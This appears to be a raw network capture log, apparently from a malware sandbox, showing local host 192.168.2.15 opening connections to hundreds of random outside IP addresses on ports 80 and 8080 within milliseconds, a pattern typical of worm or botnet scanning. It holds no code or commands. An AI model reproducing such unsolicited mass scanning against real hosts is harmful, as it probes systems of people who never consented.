Feb 14, 2024 09:28:45.362951994 CET	7840	80	192.168.2.15	88.12.52.177
Feb 14, 2024 09:28:45.362951994 CET	7840	80	192.168.2.15	88.116.106.149
Feb 14, 2024 09:28:45.362962008 CET	7840	80	192.168.2.15	88.40.146.122
Feb 14, 2024 09:28:45.362994909 CET	7840	80	192.168.2.15	88.38.24.234
Feb 14, 2024 09:28:45.363007069 CET	7840	80	192.168.2.15	88.131.178.88
Feb 14, 2024 09:28:45.363014936 CET	7840	80	192.168.2.15	88.105.167.227
Feb 14, 2024 09:28:45.363014936 CET	7840	80	192.168.2.15	88.227.1.138
Feb 14, 2024 09:28:45.363040924 CET	7840	80	192.168.2.15	88.208.217.109
Feb 14, 2024 09:28:45.363040924 CET	7840	80	192.168.2.15	88.89.248.13
Feb 14, 2024 09:28:45.363071918 CET	7840	80	192.168.2.15	88.64.185.114
Feb 14, 2024 09:28:45.363091946 CET	7840	80	192.168.2.15	88.194.28.149
Feb 14, 2024 09:28:45.363102913 CET	7840	80	192.168.2.15	88.221.78.210
Feb 14, 2024 09:28:45.363133907 CET	7840	80	192.168.2.15	88.201.7.212
Feb 14, 2024 09:28:45.363137007 CET	7840	80	192.168.2.15	88.154.6.19
Feb 14, 2024 09:28:45.363159895 CET	7840	80	192.168.2.15	88.59.10.93
Feb 14, 2024 09:28:45.363162041 CET	7840	80	192.168.2.15	88.122.81.7
Feb 14, 2024 09:28:45.363184929 CET	7840	80	192.168.2.15	88.29.122.139
Feb 14, 2024 09:28:45.363184929 CET	7840	80	192.168.2.15	88.164.26.10
Feb 14, 2024 09:28:45.363192081 CET	7840	80	192.168.2.15	88.213.17.93
Feb 14, 2024 09:28:45.363229036 CET	7840	80	192.168.2.15	88.100.198.75
Feb 14, 2024 09:28:45.363253117 CET	7840	80	192.168.2.15	88.118.190.172
Feb 14, 2024 09:28:45.363256931 CET	7840	80	192.168.2.15	88.10.182.254
Feb 14, 2024 09:28:45.363256931 CET	7840	80	192.168.2.15	88.75.150.210
Feb 14, 2024 09:28:45.363269091 CET	7840	80	192.168.2.15	88.32.0.102
Feb 14, 2024 09:28:45.363277912 CET	7840	80	192.168.2.15	88.105.25.120
Feb 14, 2024 09:28:45.363301039 CET	7840	80	192.168.2.15	88.52.26.84
Feb 14, 2024 09:28:45.363337040 CET	7840	80	192.168.2.15	88.169.108.55
Feb 14, 2024 09:28:45.363338947 CET	7840	80	192.168.2.15	88.41.214.234
Feb 14, 2024 09:28:45.363348961 CET	7840	80	192.168.2.15	88.138.147.161
Feb 14, 2024 09:28:45.363374949 CET	7840	80	192.168.2.15	88.13.114.90
Feb 14, 2024 09:28:45.363393068 CET	7840	80	192.168.2.15	88.72.95.54
Feb 14, 2024 09:28:45.363400936 CET	7840	80	192.168.2.15	88.152.145.200
Feb 14, 2024 09:28:45.363409042 CET	7840	80	192.168.2.15	88.25.198.69
Feb 14, 2024 09:28:45.363421917 CET	7840	80	192.168.2.15	88.4.240.150
Feb 14, 2024 09:28:45.363451004 CET	7840	80	192.168.2.15	88.187.130.81
Feb 14, 2024 09:28:45.363466978 CET	7840	80	192.168.2.15	88.75.109.132
Feb 14, 2024 09:28:45.363468885 CET	7840	80	192.168.2.15	88.7.27.171
Feb 14, 2024 09:28:45.363504887 CET	7840	80	192.168.2.15	88.157.39.38
Feb 14, 2024 09:28:45.363523960 CET	7840	80	192.168.2.15	88.84.145.24
Feb 14, 2024 09:28:45.363528013 CET	7840	80	192.168.2.15	88.119.98.130
Feb 14, 2024 09:28:45.363531113 CET	7840	80	192.168.2.15	88.27.251.177
Feb 14, 2024 09:28:45.363538980 CET	7840	80	192.168.2.15	88.177.83.199
Feb 14, 2024 09:28:45.363553047 CET	7840	80	192.168.2.15	88.109.15.40
Feb 14, 2024 09:28:45.363555908 CET	7840	80	192.168.2.15	88.71.81.237
Feb 14, 2024 09:28:45.363569975 CET	7840	80	192.168.2.15	88.90.208.22
Feb 14, 2024 09:28:45.363599062 CET	7840	80	192.168.2.15	88.135.130.142
Feb 14, 2024 09:28:45.363617897 CET	7840	80	192.168.2.15	88.193.39.143
Feb 14, 2024 09:28:45.363636971 CET	7840	80	192.168.2.15	88.140.126.177
Feb 14, 2024 09:28:45.363639116 CET	7840	80	192.168.2.15	88.226.36.189
Feb 14, 2024 09:28:45.363639116 CET	7840	80	192.168.2.15	88.165.63.183
Feb 14, 2024 09:28:45.363646030 CET	7840	80	192.168.2.15	88.14.85.84
Feb 14, 2024 09:28:45.363682985 CET	7840	80	192.168.2.15	88.199.253.226
Feb 14, 2024 09:28:45.363699913 CET	7840	80	192.168.2.15	88.54.187.121
Feb 14, 2024 09:28:45.363715887 CET	7840	80	192.168.2.15	88.175.87.209
Feb 14, 2024 09:28:45.363760948 CET	7840	80	192.168.2.15	88.235.218.102
Feb 14, 2024 09:28:45.363809109 CET	7840	80	192.168.2.15	88.238.67.77
Feb 14, 2024 09:28:45.363816023 CET	7840	80	192.168.2.15	88.40.114.231
Feb 14, 2024 09:28:45.363828897 CET	7840	80	192.168.2.15	88.178.200.99
Feb 14, 2024 09:28:45.363838911 CET	7840	80	192.168.2.15	88.234.241.115
Feb 14, 2024 09:28:45.363861084 CET	7840	80	192.168.2.15	88.117.82.3
Feb 14, 2024 09:28:45.363890886 CET	7840	80	192.168.2.15	88.8.212.71
Feb 14, 2024 09:28:45.363895893 CET	7840	80	192.168.2.15	88.190.147.75
Feb 14, 2024 09:28:45.363910913 CET	7840	80	192.168.2.15	88.193.110.151
Feb 14, 2024 09:28:45.363941908 CET	7840	80	192.168.2.15	88.141.92.150
Feb 14, 2024 09:28:45.363953114 CET	7840	80	192.168.2.15	88.93.41.168
Feb 14, 2024 09:28:45.363953114 CET	7840	80	192.168.2.15	88.160.9.249
Feb 14, 2024 09:28:45.363962889 CET	7840	80	192.168.2.15	88.219.212.122
Feb 14, 2024 09:28:45.363984108 CET	7840	80	192.168.2.15	88.115.243.159
Feb 14, 2024 09:28:45.363991022 CET	7840	80	192.168.2.15	88.10.195.10
Feb 14, 2024 09:28:45.364010096 CET	7840	80	192.168.2.15	88.21.22.220
Feb 14, 2024 09:28:45.364032984 CET	7840	80	192.168.2.15	88.94.140.230
Feb 14, 2024 09:28:45.364033937 CET	7840	80	192.168.2.15	88.44.35.12
Feb 14, 2024 09:28:45.364033937 CET	7840	80	192.168.2.15	88.158.43.87
Feb 14, 2024 09:28:45.364053965 CET	7840	80	192.168.2.15	88.49.85.195
Feb 14, 2024 09:28:45.364087105 CET	7840	80	192.168.2.15	88.71.138.224
Feb 14, 2024 09:28:45.364104033 CET	7840	80	192.168.2.15	88.33.93.255
Feb 14, 2024 09:28:45.364118099 CET	7840	80	192.168.2.15	88.134.188.102
Feb 14, 2024 09:28:45.364118099 CET	7840	80	192.168.2.15	88.2.182.44
Feb 14, 2024 09:28:45.364121914 CET	7840	80	192.168.2.15	88.36.9.188
Feb 14, 2024 09:28:45.364125967 CET	7840	80	192.168.2.15	88.123.91.57
Feb 14, 2024 09:28:45.364139080 CET	7840	80	192.168.2.15	88.13.58.205
Feb 14, 2024 09:28:45.364144087 CET	7840	80	192.168.2.15	88.107.191.208
Feb 14, 2024 09:28:45.364166021 CET	7840	80	192.168.2.15	88.94.71.5
Feb 14, 2024 09:28:45.364186049 CET	7840	80	192.168.2.15	88.8.223.0
Feb 14, 2024 09:28:45.364186049 CET	7840	80	192.168.2.15	88.245.28.30
Feb 14, 2024 09:28:45.364186049 CET	7840	80	192.168.2.15	88.253.81.108
Feb 14, 2024 09:28:45.364227057 CET	7840	80	192.168.2.15	88.143.117.85
Feb 14, 2024 09:28:45.364234924 CET	7840	80	192.168.2.15	88.27.136.136
Feb 14, 2024 09:28:45.364255905 CET	7840	80	192.168.2.15	88.74.242.168
Feb 14, 2024 09:28:45.364264965 CET	7840	80	192.168.2.15	88.44.190.82
Feb 14, 2024 09:28:45.364284039 CET	7840	80	192.168.2.15	88.83.216.90
Feb 14, 2024 09:28:45.364295006 CET	7840	80	192.168.2.15	88.102.23.190
Feb 14, 2024 09:28:45.364308119 CET	7840	80	192.168.2.15	88.74.82.36
Feb 14, 2024 09:28:45.364314079 CET	7840	80	192.168.2.15	88.37.25.143
Feb 14, 2024 09:28:45.364314079 CET	7840	80	192.168.2.15	88.7.164.224
Feb 14, 2024 09:28:45.364335060 CET	7840	80	192.168.2.15	88.29.114.145
Feb 14, 2024 09:28:45.364350080 CET	7840	80	192.168.2.15	88.60.105.156
Feb 14, 2024 09:28:45.364350080 CET	7840	80	192.168.2.15	88.25.64.93
Feb 14, 2024 09:28:45.364373922 CET	7840	80	192.168.2.15	88.123.124.87
Feb 14, 2024 09:28:45.364376068 CET	7840	80	192.168.2.15	88.75.177.123
Feb 14, 2024 09:28:45.364401102 CET	7840	80	192.168.2.15	88.235.56.142
Feb 14, 2024 09:28:45.364403009 CET	7840	80	192.168.2.15	88.207.112.3
Feb 14, 2024 09:28:45.364428997 CET	7840	80	192.168.2.15	88.188.217.252
Feb 14, 2024 09:28:45.364430904 CET	7840	80	192.168.2.15	88.57.15.248
Feb 14, 2024 09:28:45.364449978 CET	7840	80	192.168.2.15	88.117.210.74
Feb 14, 2024 09:28:45.364455938 CET	7840	80	192.168.2.15	88.141.93.11
Feb 14, 2024 09:28:45.364478111 CET	7840	80	192.168.2.15	88.30.147.0
Feb 14, 2024 09:28:45.364478111 CET	7840	80	192.168.2.15	88.141.168.173
Feb 14, 2024 09:28:45.364497900 CET	7840	80	192.168.2.15	88.214.230.202
Feb 14, 2024 09:28:45.364506006 CET	7840	80	192.168.2.15	88.243.171.193
Feb 14, 2024 09:28:45.364525080 CET	7840	80	192.168.2.15	88.49.50.63
Feb 14, 2024 09:28:45.364531040 CET	7840	80	192.168.2.15	88.125.9.136
Feb 14, 2024 09:28:45.364540100 CET	7840	80	192.168.2.15	88.164.206.38
Feb 14, 2024 09:28:45.364557981 CET	7840	80	192.168.2.15	88.118.52.177
Feb 14, 2024 09:28:45.364574909 CET	7840	80	192.168.2.15	88.146.223.77
Feb 14, 2024 09:28:45.364598989 CET	7840	80	192.168.2.15	88.170.197.195
Feb 14, 2024 09:28:45.364628077 CET	7840	80	192.168.2.15	88.168.234.39
Feb 14, 2024 09:28:45.364629984 CET	7840	80	192.168.2.15	88.81.251.152
Feb 14, 2024 09:28:45.364635944 CET	7840	80	192.168.2.15	88.81.170.82
Feb 14, 2024 09:28:45.364635944 CET	7840	80	192.168.2.15	88.149.181.115
Feb 14, 2024 09:28:45.364650965 CET	7840	80	192.168.2.15	88.196.51.155
Feb 14, 2024 09:28:45.364667892 CET	7840	80	192.168.2.15	88.141.209.163
Feb 14, 2024 09:28:45.364681959 CET	7840	80	192.168.2.15	88.56.22.76
Feb 14, 2024 09:28:45.364698887 CET	7840	80	192.168.2.15	88.119.167.115
Feb 14, 2024 09:28:45.364701986 CET	7840	80	192.168.2.15	88.109.53.204
Feb 14, 2024 09:28:45.364723921 CET	7840	80	192.168.2.15	88.106.76.7
Feb 14, 2024 09:28:45.364723921 CET	7840	80	192.168.2.15	88.225.211.71
Feb 14, 2024 09:28:45.364752054 CET	7840	80	192.168.2.15	88.195.140.219
Feb 14, 2024 09:28:45.364763021 CET	7840	80	192.168.2.15	88.144.121.120
Feb 14, 2024 09:28:45.364784002 CET	7840	80	192.168.2.15	88.251.19.189
Feb 14, 2024 09:28:45.364804983 CET	7840	80	192.168.2.15	88.208.47.155
Feb 14, 2024 09:28:45.364805937 CET	7840	80	192.168.2.15	88.164.158.151
Feb 14, 2024 09:28:45.364811897 CET	7840	80	192.168.2.15	88.167.75.195
Feb 14, 2024 09:28:45.364828110 CET	7840	80	192.168.2.15	88.249.88.53
Feb 14, 2024 09:28:45.364844084 CET	7840	80	192.168.2.15	88.89.49.83
Feb 14, 2024 09:28:45.364861012 CET	7840	80	192.168.2.15	88.166.173.206
Feb 14, 2024 09:28:45.364876986 CET	7840	80	192.168.2.15	88.9.216.60
Feb 14, 2024 09:28:45.364902020 CET	7840	80	192.168.2.15	88.90.232.249
Feb 14, 2024 09:28:45.364931107 CET	7840	80	192.168.2.15	88.58.111.124
Feb 14, 2024 09:28:45.364931107 CET	7840	80	192.168.2.15	88.14.97.247
Feb 14, 2024 09:28:45.365068913 CET	7840	80	192.168.2.15	88.82.88.68
Feb 14, 2024 09:28:45.376059055 CET	6752	8080	192.168.2.15	62.32.214.234
Feb 14, 2024 09:28:45.376074076 CET	6752	8080	192.168.2.15	85.35.8.86
Feb 14, 2024 09:28:45.376077890 CET	6752	8080	192.168.2.15	95.12.159.245
Feb 14, 2024 09:28:45.376080990 CET	6752	8080	192.168.2.15	94.143.104.207
Feb 14, 2024 09:28:45.376080990 CET	6752	8080	192.168.2.15	62.199.4.170
Feb 14, 2024 09:28:45.376080990 CET	6752	8080	192.168.2.15	31.47.97.227
Feb 14, 2024 09:28:45.376087904 CET	6752	8080	192.168.2.15	31.77.251.74
Feb 14, 2024 09:28:45.376087904 CET	6752	8080	192.168.2.15	31.169.82.46
Feb 14, 2024 09:28:45.376100063 CET	6752	8080	192.168.2.15	95.73.144.10
Feb 14, 2024 09:28:45.376101017 CET	6752	8080	192.168.2.15	85.48.229.105
Feb 14, 2024 09:28:45.376117945 CET	6752	8080	192.168.2.15	31.158.239.98
Feb 14, 2024 09:28:45.376121044 CET	6752	8080	192.168.2.15	94.56.212.67
Feb 14, 2024 09:28:45.376122952 CET	6752	8080	192.168.2.15	62.19.1.211
Feb 14, 2024 09:28:45.376123905 CET	6752	8080	192.168.2.15	62.120.56.173
Feb 14, 2024 09:28:45.376123905 CET	6752	8080	192.168.2.15	94.212.236.56
Feb 14, 2024 09:28:45.376130104 CET	6752	8080	192.168.2.15	94.118.9.43
Feb 14, 2024 09:28:45.376153946 CET	6752	8080	192.168.2.15	94.139.224.34
Feb 14, 2024 09:28:45.376153946 CET	6752	8080	192.168.2.15	62.153.98.12
Feb 14, 2024 09:28:45.376159906 CET	6752	8080	192.168.2.15	95.125.89.80
Feb 14, 2024 09:28:45.376159906 CET	6752	8080	192.168.2.15	62.174.236.222
Feb 14, 2024 09:28:45.376162052 CET	6752	8080	192.168.2.15	31.21.126.27
Feb 14, 2024 09:28:45.376167059 CET	6752	8080	192.168.2.15	62.247.168.230
Feb 14, 2024 09:28:45.376168013 CET	6752	8080	192.168.2.15	62.70.140.162
Feb 14, 2024 09:28:45.376172066 CET	6752	8080	192.168.2.15	85.43.100.101
Feb 14, 2024 09:28:45.376211882 CET	6752	8080	192.168.2.15	85.10.255.23
Feb 14, 2024 09:28:45.376211882 CET	6752	8080	192.168.2.15	85.112.20.210
Feb 14, 2024 09:28:45.376219034 CET	6752	8080	192.168.2.15	85.248.116.39
Feb 14, 2024 09:28:45.376244068 CET	6752	8080	192.168.2.15	31.212.47.2
Feb 14, 2024 09:28:45.376244068 CET	6752	8080	192.168.2.15	95.221.153.64
Feb 14, 2024 09:28:45.376245022 CET	6752	8080	192.168.2.15	94.93.225.255
Feb 14, 2024 09:28:45.376245022 CET	6752	8080	192.168.2.15	85.72.218.190
Feb 14, 2024 09:28:45.376245975 CET	6752	8080	192.168.2.15	62.136.186.20
Feb 14, 2024 09:28:45.376245975 CET	6752	8080	192.168.2.15	95.101.218.168
Feb 14, 2024 09:28:45.376245975 CET	6752	8080	192.168.2.15	31.156.98.86
Feb 14, 2024 09:28:45.376247883 CET	6752	8080	192.168.2.15	85.43.104.214
Feb 14, 2024 09:28:45.376245975 CET	6752	8080	192.168.2.15	31.164.102.109
Feb 14, 2024 09:28:45.376245975 CET	6752	8080	192.168.2.15	94.6.150.50
Feb 14, 2024 09:28:45.376247883 CET	6752	8080	192.168.2.15	62.37.37.29
Feb 14, 2024 09:28:45.376245022 CET	6752	8080	192.168.2.15	85.153.108.80
Feb 14, 2024 09:28:45.376245022 CET	6752	8080	192.168.2.15	85.228.102.100
Feb 14, 2024 09:28:45.376245975 CET	6752	8080	192.168.2.15	85.169.37.103
Feb 14, 2024 09:28:45.376247883 CET	6752	8080	192.168.2.15	95.81.198.95
Feb 14, 2024 09:28:45.376266956 CET	6752	8080	192.168.2.15	85.134.226.42
Feb 14, 2024 09:28:45.376266956 CET	6752	8080	192.168.2.15	85.158.219.151
Feb 14, 2024 09:28:45.376266956 CET	6752	8080	192.168.2.15	62.145.4.247
Feb 14, 2024 09:28:45.376269102 CET	6752	8080	192.168.2.15	94.184.200.118
Feb 14, 2024 09:28:45.376269102 CET	6752	8080	192.168.2.15	62.241.131.197
Feb 14, 2024 09:28:45.376270056 CET	6752	8080	192.168.2.15	95.220.217.203
Feb 14, 2024 09:28:45.376275063 CET	6752	8080	192.168.2.15	85.175.141.54
Feb 14, 2024 09:28:45.376275063 CET	6752	8080	192.168.2.15	85.182.74.132
Feb 14, 2024 09:28:45.376277924 CET	6752	8080	192.168.2.15	62.71.3.150
Feb 14, 2024 09:28:45.376277924 CET	6752	8080	192.168.2.15	94.235.214.127
Feb 14, 2024 09:28:45.376277924 CET	6752	8080	192.168.2.15	94.73.130.158
Feb 14, 2024 09:28:45.376277924 CET	6752	8080	192.168.2.15	95.247.112.197
Feb 14, 2024 09:28:45.376287937 CET	6752	8080	192.168.2.15	62.228.254.38
Feb 14, 2024 09:28:45.376287937 CET	6752	8080	192.168.2.15	85.73.174.161
Feb 14, 2024 09:28:45.376287937 CET	6752	8080	192.168.2.15	94.180.112.41
Feb 14, 2024 09:28:45.376287937 CET	6752	8080	192.168.2.15	95.52.181.1
Feb 14, 2024 09:28:45.376287937 CET	6752	8080	192.168.2.15	94.245.147.252
Feb 14, 2024 09:28:45.376287937 CET	6752	8080	192.168.2.15	95.149.238.116
Feb 14, 2024 09:28:45.376302004 CET	6752	8080	192.168.2.15	62.57.7.67
Feb 14, 2024 09:28:45.376302958 CET	6752	8080	192.168.2.15	62.210.190.176
Feb 14, 2024 09:28:45.376302004 CET	6752	8080	192.168.2.15	94.167.146.246
Feb 14, 2024 09:28:45.376302958 CET	6752	8080	192.168.2.15	85.54.237.98
Feb 14, 2024 09:28:45.376302958 CET	6752	8080	192.168.2.15	94.4.162.154
Feb 14, 2024 09:28:45.376306057 CET	6752	8080	192.168.2.15	94.115.220.72
Feb 14, 2024 09:28:45.376306057 CET	6752	8080	192.168.2.15	31.12.40.187
Feb 14, 2024 09:28:45.376306057 CET	6752	8080	192.168.2.15	95.117.201.238
Feb 14, 2024 09:28:45.376306057 CET	6752	8080	192.168.2.15	95.107.191.158
Feb 14, 2024 09:28:45.376306057 CET	6752	8080	192.168.2.15	62.243.4.123
Feb 14, 2024 09:28:45.376306057 CET	6752	8080	192.168.2.15	62.8.97.87
Feb 14, 2024 09:28:45.376306057 CET	6752	8080	192.168.2.15	94.22.33.90
Feb 14, 2024 09:28:45.376311064 CET	6752	8080	192.168.2.15	62.144.18.14
Feb 14, 2024 09:28:45.376311064 CET	6752	8080	192.168.2.15	31.143.134.222
Feb 14, 2024 09:28:45.376311064 CET	6752	8080	192.168.2.15	31.50.226.76
Feb 14, 2024 09:28:45.376311064 CET	6752	8080	192.168.2.15	94.13.31.94
Feb 14, 2024 09:28:45.376311064 CET	6752	8080	192.168.2.15	95.66.89.17
Feb 14, 2024 09:28:45.376312017 CET	6752	8080	192.168.2.15	85.234.135.148
Feb 14, 2024 09:28:45.376312017 CET	6752	8080	192.168.2.15	31.240.3.73
Feb 14, 2024 09:28:45.376312017 CET	6752	8080	192.168.2.15	85.174.84.65
Feb 14, 2024 09:28:45.376317978 CET	6752	8080	192.168.2.15	94.202.78.1
Feb 14, 2024 09:28:45.376317978 CET	6752	8080	192.168.2.15	95.20.252.191
Feb 14, 2024 09:28:45.376327038 CET	6752	8080	192.168.2.15	95.53.158.159
Feb 14, 2024 09:28:45.376327038 CET	6752	8080	192.168.2.15	31.60.149.110
Feb 14, 2024 09:28:45.376329899 CET	6752	8080	192.168.2.15	94.12.113.80
Feb 14, 2024 09:28:45.376329899 CET	6752	8080	192.168.2.15	95.205.13.209
Feb 14, 2024 09:28:45.376329899 CET	6752	8080	192.168.2.15	94.192.135.170
Feb 14, 2024 09:28:45.376338005 CET	6752	8080	192.168.2.15	85.216.229.93
Feb 14, 2024 09:28:45.376342058 CET	6752	8080	192.168.2.15	85.105.149.25
Feb 14, 2024 09:28:45.376354933 CET	6752	8080	192.168.2.15	85.216.64.143
Feb 14, 2024 09:28:45.376357079 CET	6752	8080	192.168.2.15	94.66.35.83
Feb 14, 2024 09:28:45.376358986 CET	6752	8080	192.168.2.15	95.35.156.1
Feb 14, 2024 09:28:45.376357079 CET	6752	8080	192.168.2.15	95.152.8.95
Feb 14, 2024 09:28:45.376358032 CET	6752	8080	192.168.2.15	94.142.50.135
Feb 14, 2024 09:28:45.376358986 CET	6752	8080	192.168.2.15	62.212.255.236
Feb 14, 2024 09:28:45.376358986 CET	6752	8080	192.168.2.15	62.38.209.210
Feb 14, 2024 09:28:45.376358986 CET	6752	8080	192.168.2.15	85.124.49.204
Feb 14, 2024 09:28:45.376358986 CET	6752	8080	192.168.2.15	85.82.75.169
Feb 14, 2024 09:28:45.376358986 CET	6752	8080	192.168.2.15	95.225.220.165
Feb 14, 2024 09:28:45.376358986 CET	6752	8080	192.168.2.15	62.161.34.48
Feb 14, 2024 09:28:45.376363993 CET	6752	8080	192.168.2.15	94.234.49.5
Feb 14, 2024 09:28:45.376363993 CET	6752	8080	192.168.2.15	95.75.40.27
Feb 14, 2024 09:28:45.376365900 CET	6752	8080	192.168.2.15	62.56.1.136
Feb 14, 2024 09:28:45.376363993 CET	6752	8080	192.168.2.15	62.90.63.111
Feb 14, 2024 09:28:45.376365900 CET	6752	8080	192.168.2.15	62.64.107.131
Feb 14, 2024 09:28:45.376363993 CET	6752	8080	192.168.2.15	31.83.247.42
Feb 14, 2024 09:28:45.376368999 CET	6752	8080	192.168.2.15	95.147.170.36
Feb 14, 2024 09:28:45.376368046 CET	6752	8080	192.168.2.15	31.156.198.72
Feb 14, 2024 09:28:45.376368999 CET	6752	8080	192.168.2.15	85.1.138.252
Feb 14, 2024 09:28:45.376368046 CET	6752	8080	192.168.2.15	94.17.187.209
Feb 14, 2024 09:28:45.376368999 CET	6752	8080	192.168.2.15	85.175.216.118
Feb 14, 2024 09:28:45.376372099 CET	6752	8080	192.168.2.15	31.213.123.79
Feb 14, 2024 09:28:45.376368046 CET	6752	8080	192.168.2.15	85.188.1.36
Feb 14, 2024 09:28:45.376372099 CET	6752	8080	192.168.2.15	31.225.160.232
Feb 14, 2024 09:28:45.376368999 CET	6752	8080	192.168.2.15	85.133.117.131
Feb 14, 2024 09:28:45.376372099 CET	6752	8080	192.168.2.15	62.147.251.65
Feb 14, 2024 09:28:45.376368999 CET	6752	8080	192.168.2.15	62.239.236.161
Feb 14, 2024 09:28:45.376368999 CET	6752	8080	192.168.2.15	31.21.76.199
Feb 14, 2024 09:28:45.376380920 CET	6752	8080	192.168.2.15	95.24.117.11
Feb 14, 2024 09:28:45.376380920 CET	6752	8080	192.168.2.15	62.126.56.172
Feb 14, 2024 09:28:45.376380920 CET	6752	8080	192.168.2.15	95.198.179.62
Feb 14, 2024 09:28:45.376388073 CET	6752	8080	192.168.2.15	31.149.38.154
Feb 14, 2024 09:28:45.376409054 CET	6752	8080	192.168.2.15	31.254.161.20
Feb 14, 2024 09:28:45.376409054 CET	6752	8080	192.168.2.15	95.253.12.100
Feb 14, 2024 09:28:45.376426935 CET	6752	8080	192.168.2.15	31.90.1.48
Feb 14, 2024 09:28:45.376426935 CET	6752	8080	192.168.2.15	95.142.73.119
Feb 14, 2024 09:28:45.376426935 CET	6752	8080	192.168.2.15	31.42.211.119
Feb 14, 2024 09:28:45.376435041 CET	6752	8080	192.168.2.15	85.68.176.99
Feb 14, 2024 09:28:45.376435041 CET	6752	8080	192.168.2.15	31.136.242.67
Feb 14, 2024 09:28:45.376435041 CET	6752	8080	192.168.2.15	62.89.109.56
Feb 14, 2024 09:28:45.376442909 CET	6752	8080	192.168.2.15	95.58.220.116
Feb 14, 2024 09:28:45.376442909 CET	6752	8080	192.168.2.15	85.99.25.160
Feb 14, 2024 09:28:45.376442909 CET	6752	8080	192.168.2.15	62.246.20.253
Feb 14, 2024 09:28:45.376444101 CET	6752	8080	192.168.2.15	31.148.166.252
Feb 14, 2024 09:28:45.376444101 CET	6752	8080	192.168.2.15	85.177.193.78
Feb 14, 2024 09:28:45.376444101 CET	6752	8080	192.168.2.15	94.128.47.27
Feb 14, 2024 09:28:45.376444101 CET	6752	8080	192.168.2.15	31.36.228.202
Feb 14, 2024 09:28:45.376455069 CET	6752	8080	192.168.2.15	31.249.129.211
Feb 14, 2024 09:28:45.376455069 CET	6752	8080	192.168.2.15	95.236.22.61
Feb 14, 2024 09:28:45.376460075 CET	6752	8080	192.168.2.15	95.29.33.6
Feb 14, 2024 09:28:45.376460075 CET	6752	8080	192.168.2.15	62.248.27.208
Feb 14, 2024 09:28:45.376462936 CET	6752	8080	192.168.2.15	95.228.250.157
Feb 14, 2024 09:28:45.376466990 CET	6752	8080	192.168.2.15	62.215.39.177
Feb 14, 2024 09:28:45.376471043 CET	6752	8080	192.168.2.15	85.176.174.200
Feb 14, 2024 09:28:45.376477957 CET	6752	8080	192.168.2.15	94.134.36.151
Feb 14, 2024 09:28:45.376485109 CET	6752	8080	192.168.2.15	94.34.45.160
Feb 14, 2024 09:28:45.376487017 CET	6752	8080	192.168.2.15	95.83.116.97
Feb 14, 2024 09:28:45.376499891 CET	6752	8080	192.168.2.15	95.70.176.215
Feb 14, 2024 09:28:45.376499891 CET	6752	8080	192.168.2.15	94.217.8.135
Feb 14, 2024 09:28:45.376502037 CET	6752	8080	192.168.2.15	85.180.251.52
Feb 14, 2024 09:28:45.376518965 CET	6752	8080	192.168.2.15	85.157.200.171
Feb 14, 2024 09:28:45.376522064 CET	6752	8080	192.168.2.15	95.155.59.109
Feb 14, 2024 09:28:45.376528025 CET	6752	8080	192.168.2.15	94.78.154.237
Feb 14, 2024 09:28:45.376528025 CET	6752	8080	192.168.2.15	85.39.233.104
Feb 14, 2024 09:28:45.376529932 CET	6752	8080	192.168.2.15	31.119.200.48
Feb 14, 2024 09:28:45.376533985 CET	6752	8080	192.168.2.15	94.86.91.180
Feb 14, 2024 09:28:45.376533985 CET	6752	8080	192.168.2.15	85.114.23.160
Feb 14, 2024 09:28:45.376545906 CET	6752	8080	192.168.2.15	94.250.187.53
Feb 14, 2024 09:28:45.376549959 CET	6752	8080	192.168.2.15	31.125.194.73
Feb 14, 2024 09:28:45.376552105 CET	6752	8080	192.168.2.15	62.4.155.31
Feb 14, 2024 09:28:45.376552105 CET	6752	8080	192.168.2.15	94.254.39.77
Feb 14, 2024 09:28:45.376555920 CET	6752	8080	192.168.2.15	62.31.1.150
Feb 14, 2024 09:28:45.376559973 CET	6752	8080	192.168.2.15	85.62.48.232
Feb 14, 2024 09:28:45.376559973 CET	6752	8080	192.168.2.15	94.53.238.70
Feb 14, 2024 09:28:45.376568079 CET	6752	8080	192.168.2.15	95.86.10.82
Feb 14, 2024 09:28:45.376578093 CET	6752	8080	192.168.2.15	95.218.213.225
Feb 14, 2024 09:28:45.376585960 CET	6752	8080	192.168.2.15	95.28.102.235
Feb 14, 2024 09:28:45.376590014 CET	6752	8080	192.168.2.15	31.40.223.94
Feb 14, 2024 09:28:45.376590014 CET	6752	8080	192.168.2.15	62.229.135.26
Feb 14, 2024 09:28:45.376590014 CET	6752	8080	192.168.2.15	94.193.85.91
Feb 14, 2024 09:28:45.376590014 CET	6752	8080	192.168.2.15	95.98.208.247
Feb 14, 2024 09:28:45.376596928 CET	6752	8080	192.168.2.15	94.113.167.59
Feb 14, 2024 09:28:45.376600027 CET	6752	8080	192.168.2.15	94.101.179.96
Feb 14, 2024 09:28:45.376600981 CET	6752	8080	192.168.2.15	95.230.44.196
Feb 14, 2024 09:28:45.376600981 CET	6752	8080	192.168.2.15	94.45.57.105
Feb 14, 2024 09:28:45.376612902 CET	6752	8080	192.168.2.15	95.3.13.12
Feb 14, 2024 09:28:45.376616955 CET	6752	8080	192.168.2.15	95.138.18.2
Feb 14, 2024 09:28:45.376616955 CET	6752	8080	192.168.2.15	62.178.29.7
Feb 14, 2024 09:28:45.376621008 CET	6752	8080	192.168.2.15	94.121.242.44
Feb 14, 2024 09:28:45.376626015 CET	6752	8080	192.168.2.15	85.12.247.7
Feb 14, 2024 09:28:45.376626968 CET	6752	8080	192.168.2.15	31.21.7.4
Feb 14, 2024 09:28:45.376641035 CET	6752	8080	192.168.2.15	62.133.102.208
Feb 14, 2024 09:28:45.376641989 CET	6752	8080	192.168.2.15	94.153.63.99
Feb 14, 2024 09:28:45.376652002 CET	6752	8080	192.168.2.15	95.232.143.252
Feb 14, 2024 09:28:45.376661062 CET	6752	8080	192.168.2.15	85.245.163.144
Feb 14, 2024 09:28:45.376666069 CET	6752	8080	192.168.2.15	94.100.123.229
Feb 14, 2024 09:28:45.376666069 CET	6752	8080	192.168.2.15	95.69.241.116
Feb 14, 2024 09:28:45.376666069 CET	6752	8080	192.168.2.15	85.124.84.190
Feb 14, 2024 09:28:45.376666069 CET	6752	8080	192.168.2.15	85.188.68.241
Feb 14, 2024 09:28:45.376667976 CET	6752	8080	192.168.2.15	62.103.51.234
Feb 14, 2024 09:28:45.376667976 CET	6752	8080	192.168.2.15	31.34.47.220
Feb 14, 2024 09:28:45.376669884 CET	6752	8080	192.168.2.15	85.76.151.92
Feb 14, 2024 09:28:45.376674891 CET	6752	8080	192.168.2.15	85.242.75.3
Feb 14, 2024 09:28:45.376681089 CET	6752	8080	192.168.2.15	95.185.55.121
Feb 14, 2024 09:28:45.376698017 CET	6752	8080	192.168.2.15	94.58.85.24
